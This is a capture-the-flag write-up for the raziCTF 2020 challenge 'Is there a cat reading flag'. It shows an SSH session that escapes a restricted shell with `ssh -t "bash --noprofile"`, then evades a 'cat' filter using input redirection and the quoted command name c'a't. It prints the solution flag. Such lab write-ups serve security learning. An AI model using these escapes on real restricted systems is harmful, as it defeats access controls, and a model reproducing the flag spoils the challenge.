raziCTF 2020 : Is there a cat reading flag
Oct 26, 2020
Challenge Description
Solution
On This Chalange we where given a server with an ssh login credentials
Login into the target host we noticed that its a restricted shell:
m3dsec@local:~$ ssh catFlag@37.152.181.193
catFlag@37.152.181.193's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)
...
Last login: Thu Oct 29 05:49:59 2020 from 123.139.80.95
catFlag@ariyan-server:~$ id
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
catFlag@ariyan-server:~$ ls
bin flag.txt
catFlag@ariyan-server:~$ cat flag.txt
no cat flag.txt
catFlag@ariyan-server:~$ less falg.txt
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
We can see the flag, but we can't read it, we had to bypass the rbash first:
m3dsec@local:~$ ssh catFlag@37.152.181.193 -t "bash --noprofile"
catFlag@37.152.181.193's password:
catFlag@ariyan-server:~$ /bin/less<flag.txt
RaziCTF{th3r3_!s_4_c4t_c4ll3d_fl4g}
or
catFlag@ariyan-server:~$ /bin/c'a't flag.txt
RaziCTF{th3r3_!s_4_c4t_c4ll3d_fl4g}